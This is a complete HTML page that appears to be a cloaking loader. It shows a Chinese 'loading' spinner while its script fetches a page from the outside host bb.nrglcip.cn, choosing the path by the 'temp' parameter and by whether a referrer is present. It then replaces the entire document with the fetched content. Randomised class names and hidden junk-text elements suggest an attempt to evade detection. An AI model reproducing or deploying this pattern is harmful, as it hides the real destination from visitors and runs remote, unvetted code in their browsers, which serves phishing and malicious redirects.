<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WgIoJpQl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WgIoJpQl .p9vM2hVw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WgIoJpQl .content {
            line-height: 50px;
            text-align: center
        }

        .WgIoJpQl .img {
            width: 100%
        }

        .WgIoJpQl .LxNkOshS5At {
            text-align: center
        }

        .WgIoJpQl .LxNkOshS5At span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WgIoJpQl .LxNkOshS5At span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WgIoJpQl .LxNkOshS5At span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WgIoJpQl .LxNkOshS5At span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WgIoJpQl .LxNkOshS5At span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WgIoJpQl .LxNkOshS5At span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WgIoJpQl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function n6Jwfo4Ktch(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zZuQ5 = n6Jwfo4Ktch('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zZuQ5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zZuQ5 +".html?a=share";
		}
		
        K9zvvwm=url+"#"+new Date().getTime();
        K9zvvwm && function() {
            $.get(K9zvvwm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>rYouW2cDKPar2Ck7mA2QP6sd73jmn5W3LVJMTnW5KBO7BRIC2FGnxOt2M68jqysa8x3lqa6ZwM4bXAQOacVGIrTs7LM8LWC</div>
<ul style='display:none' >cdVotTxHQOBJQBoFihXVIIvlbLmfSrmxNUPUn6dMkLypttBXIL0DqCjAS1JNb27vfwd9zWqpCUtwM6</ul>
<a  href='#' style='display:none'>vZ11xUvvKk9v4J5a56nO2TjJsWdD9u1P90NMLaFkhJDvRS9tu</a>
<h1 style='display:none' >hTy9c7sZOmFpT8Bi7Kgh9kSZPY9H1C9a58avrJIm0EqjTAs6SiPLXiPf8bH4U37Jkb0jNtoeMfN9c4JmD1jG9PrJVq3</h1>
<b style='display:none' >hmV1YCJju9mnOhR0teXiNe8j2NFfgb22y9WOI5aBxO9y9X</b>
<b style='display:none' >hmV1YCJju9mnOhR0teXiNe8j2NFfgb22y9WOI5aBxO9y9X</b>
<span style='display:none'>IwuO8zyHNGlxy7mk1tyKq6b8X5t1I4fSczxHCfKTn0rVg56gX</span>
<a  href='#' style='display:none'>vZ11xUvvKk9v4J5a56nO2TjJsWdD9u1P90NMLaFkhJDvRS9tu</a><div class="WgIoJpQl">
    <div class="p9vM2hVw">
        <div class="LxNkOshS5At">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >Vg6SBrB2kRBVFXFxMJRaGDtEpyHOSVTSti4rUas2</h1>
<span style='display:none'>dndTLt4EGrjNHZXv8</span>
<img  src='' style='display:none'>
<span style='display:none'>dndTLt4EGrjNHZXv8</span>
<p  style='display:none'>s3jo6d2B0Yw8vwq0BB7TCRw6cCgBGgTpeMrkX3XM2XdV8aXWew5aETQK0KOK6PWTaJeclwbsDtpYqbuQib4ble5qxmw4f2ILlpa</p></body>
</html>